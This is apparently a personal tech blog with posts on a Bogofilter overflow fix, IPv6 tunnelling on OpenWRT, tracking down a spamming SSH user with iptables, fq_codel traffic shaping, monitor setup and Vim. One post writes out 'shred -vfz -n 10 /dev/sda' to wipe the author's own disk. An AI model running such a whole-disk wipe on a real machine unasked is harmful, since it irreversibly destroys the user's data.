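int put_fallback_byte(char **outbuf, size_t *outbytesleft, char c)
{
    if (*outbytesleft == 0)
        return -1; /* caller should treat this like E2BIG */
    **outbuf = c;
    *outbuf += 1;
    *outbytesleft -= 1;
    return 0;
}
```

In the EILSEQ/EINVAL branch, a caller would use this instead of the unconditional *outbuf = '?' and handle a -1 return the same way as the E2BIG case.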

Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.

How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.

Live and in Color in Hamburg

Want to hear what I have to say? This month I am a guest at two events in Hamburg: first, tomorrow, at a panel discussion at Kultwerk West on the topic: Theater subscriptions for IT specialists? Joachim Lux, Shahab Din and Julius Plenz on culture and nerds and Lux’ understanding of being human.

And like every year, in two weeks I will also be at the Software Freedom Day, this time with a talk on bufferbloat and a small Git workshop for beginners. Promisingly, this year there are two parallel talk tracks in new premises. I'm looking forward to it!

IPv6 ... here I come

Sooo... I'm finally part of the IPv6 world now, and so is this blog. I've been meaning to do this for a long time now, but ... you know. – I ran into some traps – partly my own fault – so I might as well share them for others, too.

First of all, and this got me several times: when testing, loosen up your iptables settings. That especially means setting the right policies in ip6tables: ip6tables -P INPUT ACCEPT. (I had previously set the default policy to DROP automatically at interface-up time. It's better safe than sorry. Do you know what services listen on :: by default?)

I started out using a simple Teredo tunnel, which worked well enough. See Bart's article ipv6 on your desktop in 2 steps. The default gai.conf, used by the glibc to resolve hosts, will still prefer IPv4 addresses over IPv6 if your only access is a Teredo tunnel. You can change this by commenting out the default label policies in /etc/gai.conf, except for the #label 2001:0::/32 7 line. (See here for example. The blog post advises to reboot or wait 15 minutes, but for me it was enough to re-start my browser / newsreader / ...)

So I set up IPv6 on my server. This was rather easy because Hetzner provides native v6. The real work is just re-creating the iptables rules, adding new AAAA records for DNS. Strike that: The real work is teaching all your small tools to accept IPv6-formatted addresses. (Great efforts are underway to modernize many programs. But especially your odd Perl script will simply choke on the new log files. :-P)

I am still not sure how I should use all these addresses. For now I enabled one "main" IP for the server, 2a01:4f8:150:4022::2. Then I have one for plenz.com and one for the blog, ending in leet-speak "blog": 2a01:4f8:150:4022::b109 – Is it useful to enable one IP for every subdomain and service? It sure seems nice, but also a big administrative burden...

Living with the Teredo tunnel for some hours, I wanted to do it "the right way", i.e. enabling IPv6 tunneling on my router. Over at HE's Tunnelbroker you'll get your free tunnel, suitable for connecting your home network.

I'm still using an old OpenWRT WhiteRussian setup with 2.4 kernel, but everything works surprisingly well, once I figured out how to do it properly. HE conveniently provides commands to set up the tunnel; however, setting up the tunnel creates a default route that routes packets destined to your prefix across the tunnel. (I don't know why this is the case.) Thus, after establishing the tunnel, I'm doing:

# send traffic destined to my prefix via the LAN bridge br0

ip route del <prefix>::/64 dev he-ipv6

ip route add <prefix>::/64 dev br0

Second, I want to automatically update my IPv6 tunnel endpoint address. HE conveniently provides an IPv4 interface for that. Simply md5-hash your password via echo -n PASS | md5sum, find out your user name hash from the login start page (apparently not the md5 hash of your username :-P) and your tunnel ID. My script looks like this:

root@ndogo:~# cat /etc/ppp/ip-up.d/he-tunnel

#!/bin/sh

set -x

my_ip="$(ip addr show dev ppp0 | grep ' inet ' | awk '{print $2}')"

wget -O /dev/null "http://ipv4.tunnelbroker.net/ipv4_end.php?ipv4b=$my_ip&pass=PWHASH&user_id=UHASH&tunnel_id=TID"

ip tunnel del he-ipv6

ip tunnel add he-ipv6 mode sit remote 216.66.86.114 local $my_ip ttl 255

# watch the MTU!

ip link set dev he-ipv6 mtu 1280

ip link set he-ipv6 up

ip addr add <prefix>::2/64 dev he-ipv6

ip route add ::/0 dev he-ipv6 mtu 1280

# fix up the routes

ip route del <prefix>::/64 dev he-ipv6

ip route add <prefix>::/64 dev br0 2>/dev/null

Side note: Don't think that scripts under /etc/ppp/ip-up.d would get executed automatically when the interface comes up. Use something like this instead:

root@ndogo:~# cat /etc/hotplug.d/iface/20-ipv6

#!/bin/sh

[ "${ACTION:-ifup}" = "ifup" ] && /etc/ppp/ip-up.d/he-tunnel

The connection seemed to work nicely at first. At least, all Google searches were using IPv6 and were fast at that. However, oftentimes (in about 80% of cases) establishing a connection via IPv6 was not working. Pings (and thus traceroutes) showed no network outage or other delays along the way. However, tcpdump showed wrong checksums for a lot of TCP packets.

Only today I got an idea why this might be: wrong MTU. So I set the MTU to 1280 in the HE web interface and on the router, too: ip link set dev he-ipv6 mtu 1280. Suddenly, all connections work perfectly.
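A back-of-the-envelope check of why 1280 is a safe value: a sit tunnel wraps every IPv6 packet in an IPv4 header (20 bytes without options), so the largest IPv6 packet that fits is the MTU of the underlying link minus 20. 1280 is the minimum MTU every IPv6 link has to support. The sketch below uses hypothetical names, and the link MTUs used in the usage note (1500 for Ethernet, 1492 for a PPPoE line) are assumptions, not values measured on my router.

```c
#define IPV4_HEADER_LEN 20 /* IPv4 header without options */
#define IPV6_MIN_MTU 1280  /* smallest MTU an IPv6 link must support */

/* Largest IPv6 packet that fits into one IPv4 packet on the link. */
int sit_payload_mtu(int link_mtu)
{
    return link_mtu - IPV4_HEADER_LEN;
}

/* Nonzero if minimum-size IPv6 packets pass through without fragmentation. */
int ipv6_min_mtu_fits(int link_mtu)
{
    return sit_payload_mtu(link_mtu) >= IPV6_MIN_MTU;
}
```

On a 1500-byte link this gives 1480, on a 1492-byte link 1472; both are above 1280, so a tunnel MTU of 1280 always fits, while a larger value only works if every hop in between can carry it.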

I've been toying around with the privacy extensions, too, but I don't know how to enable the mode "one IP per new service provider". There's some information about the PEs here but for now I have disabled them.

My flatmate's Windows computer and iPhone picked up IPv6 without further configuration.

I'm actually astonished how many web sites are IPv6 ready. So far I like what I'm seeing.

Update: While setting up an AAAA record for the blog, I forgot it had been a wildcard CNAME previously. The blog was not reachable via IPv4 for a day – that was not intended! ;-)

Find the Spammer

A week ago our server was listed as sending out spam by the CBL, which is part of the XBL which in turn is part of the widely-used Spamhaus ZEN block list. As a practical result, we couldn't send out mail to GMX or Hotmail any more:

<someone@gmx.de>: host mx0.gmx.net[213.165.64.100] said:

550-5.7.1 {mx048} The IP address of the server you are using to connect to GMX is listed in

550-5.7.1 the XBL Blocking List (CBL + NJABL). 550-5.7.1 For additional information, please visit

550-5.7.1 http://www.spamhaus.org/query/bl?ip=176.9.34.52 and

550 5.7.1 ( http://portal.gmx.net/serverrules ) (in reply to RCPT TO command)

The first source we identified was a postfix alias forwarding to a virtual alias domain; however, I had deleted the user in the latter table, such that postfix would return a "user unknown in virtual alias table" error to the sender. But because the sender was localhost, postfix would create a bounce mail. (This is known as Backscatter.)

But one day later, our IP was listed in CBL again. So I started digging deeper. How do you identify who is sending out spam? There are some obvious points to start:

- Old WordPress installations and the like that got owned

- Open Relay (mis-configured postfix)

- Spam-sending trojan (local process running)

To get a clearer picture of what was really happening, I did two things. First, I implemented a very simple "who is doing SMTP" log mechanism using iptables. It went like this:

$ cut -d: -f1 /etc/passwd | while read user; do

echo iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner $user -j LOG --log-prefix \"$user tried SMTP: \" --log-level 6;

done

iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner root -j LOG --log-prefix "root tried SMTP: " --log-level 6

iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner feh -j LOG --log-prefix "feh tried SMTP: " --log-level 6

...

(To be honest I used a Vim macro to make the list of rules, but that's hard to write down in a blog post.)

Second, I NAT'ed all users except for postfix to a different IP address:

$ iptables -t nat -A POSTROUTING -p tcp --dport 25 -m owner ! --uid-owner postfix -j SNAT --to-source 176.9.247.94

Then, I dumped the SMTP-related TCP flows for that IP address:

$ tcpflow -c 'host 176.9.247.94 and (dst port 25 or src port 25)'

I waited for a short time, and soon another wave of spam was sent out. Now I could clearly identify the user:

Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...

Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...

Jul 19 16:48:44 noam kernel: [5590942.615608] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
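With more than a handful of users, a quick tally of the log lines helps. The following is a minimal sketch that assumes the log format shown above, i.e. the user name is the word directly before "tried SMTP:". The function name count_smtp_users is made up for this example:

```shell
#!/bin/sh
# Sketch: count "<user> tried SMTP:" lines per user, most active first.
# Reads the files given as arguments, or stdin if there are none.
count_smtp_users() {
    sed -n 's/.* \([^ ]*\) tried SMTP: .*/\1/p' "$@" | sort | uniq -c | sort -rn
}
```

It could be called as count_smtp_users /var/log/kern.log, where the log file path is an assumption that depends on the syslog configuration.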

But instead of finding an infected web app, I found that the user was

logged in via SSH and was executing sleep 3600 commands. When I

killed the SSH session, the spamming stopped immediately.

Since this was not a user I know personally, I don't know what happened. My best guess is an infected Windows computer and an SSH SOCKS forwarding setup that allowed the (Romanian) spammer to tunnel their connections.

One question remains: Are modern spam-drones able to steal WinSCP/PuTTY login credentials from the Registry and use them to silently set up SSH tunnels? Or was this just a case of bad luck?

Trying the CoDel Bufferbloat solution locally

I'm currently working on a computer science project where we try to understand the bufferbloat phenomenon and possibly research solutions to it. We set up some simple automated RRD graphing to better visualize the phenomenon.



In short – and most internet users would say this is perfectly normal behaviour – Bufferbloat describes that with high-speed uploads or downloads, network latency skyrockets. For my home router and a five-megabyte upload, it looks like this:

The grid intervals are in seconds and feature 10 data points corresponding to 10 pings in that second to a server (here 8.8.8.8). Lighter blue means further away from the median, which for clarity is displayed as a black line, too. – Thus you can see that the nearly constant ping time of ~20ms goes up to an unsteady ~140ms during the upload.

In the next-20120524 Kernel tree the codel and fq_codel queuing

disciplines were made available.

The CoDel implementation is based on this month's paper by Van

Jacobson et al., which is

definitely worth a read (and features good explanatory diagrams, too).

So I set out to try fq_codel locally first, that is: limiting my

Wifi output rate to the supposed output rate of my cable modem and then

redoing the same upload.

In tc commands, this translates to:

IF=wlan0

tc qdisc del dev $IF root

tc qdisc add dev $IF root handle 1: htb

tc class add dev $IF parent 1: classid 1:1 htb rate 125kbps

tc qdisc add dev $IF parent 1:1 handle 10: fq_codel

tc filter add dev $IF protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:1
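One thing that is easy to trip over: in tc, the unit kbps means kilobytes per second, while kbit means kilobits per second. So rate 125kbps above corresponds to a 1 Mbit/s uplink, which roughly fits the unshaped upload (five megabytes in 45.7 seconds is about 109 kB/s). A tiny conversion sketch, where kbit_to_tc_rate is a hypothetical helper name:

```shell
#!/bin/sh
# Sketch: convert a line rate in kbit/s into tc's "kbps" (kilobytes/s) notation.
kbit_to_tc_rate() {
    echo "$(( $1 / 8 ))kbps"   # 8 bits per byte; integer division
}

kbit_to_tc_rate 1000   # prints 125kbps
```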



And guess what happens? The upload that took 45.7 seconds before now takes 46.9 seconds; but the median ping times are around 30ms as opposed to ~140ms. (Also, consider that the packet loss is down to 0% as opposed to 1.5% before.) So this is really nice:

I hope I can test this with my colleagues using a fresh CeroWRT install next week such that we can control all the parameters and do more accurate measurements.

Update: The default 13 parameter to the root handle HTB qdisc

that was present in the original version of this post is unnecessary

and was thus removed.

New screens

I have a pair of new monitors (Dell U2312HM, find them here). I used to have one somewhat cheap 18.5" widescreen with 1366x768 (which is the same resolution as my Thinkpad X220), but reading long texts or working long hours really tired my eyes a lot.

The new screens have nice 23" IPS panels with great viewing angles. But most important of all, I can adjust the height of the screens and rotate them. Now my desk looks like this:

The X220 can only have two monitors connected at once. Also, the Docking Station's DVI output is single link. Thus, I connect one of the monitors via VGA and the other via DVI.

I use a simple shell script that is invoked when I press Fn+F7. Note that you have to turn off the LVDS1 internal display first before you can activate the two screens at once.

if [ $(xrandr -q | grep -c " 1920x1080 60.0 +") -eq 2 ]; then

xrandr --output LVDS1 --off

xrandr --output HDMI3 --auto --rotate left --output VGA1 --auto --right-of HDMI3 --primary

else

xrandr --output VGA1 --off --output HDMI3 --off

xrandr --output LVDS1 --auto

fi

minimizing Linux filesystem cache effects

Last weekend I toyed around a bit and tried to write a shared object

library that can be used via LD_PRELOAD to minimize the effect a

program has on the Linux filesystem

cache.

Basically the use case is that you have a production system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I haven't yet tested whether this brings measurable improvements.
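One way to check for an effect would be to compare the size of the page cache before and after a run. This is only a sketch, assuming the Cached: line of /proc/meminfo is a good enough proxy. The helper cached_kb is hypothetical, and the library and script names in the usage comment are placeholders:

```shell
#!/bin/sh
# Sketch: print the page cache size in kB as reported by /proc/meminfo.
# An alternative file can be passed as first argument (handy for testing).
cached_kb() {
    awk '/^Cached:/ { print $2 }' "${1:-/proc/meminfo}"
}

# Usage idea (placeholder names, not actual files):
#   before=$(cached_kb)
#   LD_PRELOAD=./mylib.so ./backup.sh
#   after=$(cached_kb)
#   echo "cache grew by $((after - before)) kB"
```

Other processes touch the cache at the same time, so a single run like this gives a rough indication at best.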

The coding was really fun and gave me yet another insight into how great the simple concept of file descriptors in UNIX is. (GNU software is tough, though: I got stuck once, and found help on Stack Overflow, which I had never used before.)

shredding

I'm currently shredding my old X41's hard drive, because I want to sell it (if you are interested, contact me). I'm overwriting it ten times, followed by a final pass of zeros:

$ shred -vfz -n 10 /dev/sda

Luckily, the disk was fully encrypted all the time. So it's just a precaution.

Ten Years of Vim

About ten years ago, I began using Vim. Since about eight years ago, I have been using Vim for every email, every piece of code, literally every text I write. Today, I want to write a short text about how I came to use Vim and what I like about it.

I don't really remember when I first used Vim. It must have been around the time when I was programming PHP a lot. I had access to a "real" computer at home – running Windows XP – in 2002 for the first time; before that, I could only use older Macintoshes. It's typical for first-time Vi users to believe – by hearsay, I guess – that it is indeed a really superior editor, until they try it out for the first time and can't even save, because they don't know how to. That was probably my first experience, too.

Anyhow, at some point in time I ditched PHP Zend Studio for SciTE. Later, I got to know Vim (i.e., by reading a tutorial about it and actually understanding it) and was instantly hooked. Probably, the guys over at #html.de talked me into it. Ironically, I used Vim before I ever used a UNIX-like operating system.

In my Vim learning curve, I identify seven important advances:

- Understanding the Modes Concept. – This, of course, is something everybody needs to grok. It's fairly straight-forward, once you think about it.

- Understanding the Visual Mode and Yank/Paste. – Line-wise selection already gives you more power than a regular editor when moving code.

- Understanding Mappings and Macros. – Even today I am amazed how few people automate things. If it's one line, do it manually. If it's three lines, carefully think about the task while recording a macro for it!

- Understanding Windows. – Multiple files and stuff.

- Consistently using [h], [j], [k], [l]. – This actually was

a much bigger step than you might think. I went to great lengths to

achieve this: I configured the arrow mapping to